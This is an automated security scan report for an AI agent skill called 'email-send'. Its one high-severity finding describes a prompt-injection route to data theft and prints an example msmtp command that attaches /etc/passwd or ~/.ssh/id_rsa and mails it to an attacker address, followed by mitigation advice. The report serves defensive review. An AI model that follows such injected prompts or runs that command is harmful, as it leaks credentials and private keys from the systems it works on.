Trust Assessment
email-send received a trust score of 86/100, placing it in the Mostly Trusted category. This skill has passed most security checks with only minor considerations noted.
SkillShield's automated analysis identified 1 finding: 0 critical, 1 high, 0 medium, and 0 low severity. Key findings include Potential Data Exfiltration via File Attachment.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings1
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| HIGH | Potential Data Exfiltration via File Attachment The skill documentation explicitly mentions the `--attach <file>` option for `msmtp`. If the AI agent allows untrusted user input to specify the file path for this option, it could lead to arbitrary file exfiltration from the system. An attacker could craft a prompt instructing the agent to use the `email-send` skill with the `--attach` option, specifying a sensitive file path (e.g., `/etc/passwd`, `~/.ssh/id_rsa`). The agent, following the skill's documented capability, would then execute `msmtp --attach /path/to/sensitive/file recipient@attacker.com`, leading to data exfiltration. When implementing the skill, ensure that the `--attach <file>` option is either disabled, restricted to a safe, sandboxed directory, or requires explicit user confirmation for each attachment. Implement strict input validation and sanitization for file paths to prevent access to sensitive system files. Consider using an allowlist for file types or directories. | LLM | SKILL.md:23 |
Scan History
Embed Code
[](https://skillshield.io/report/8b21f5e90412c8e0)
Powered by SkillShield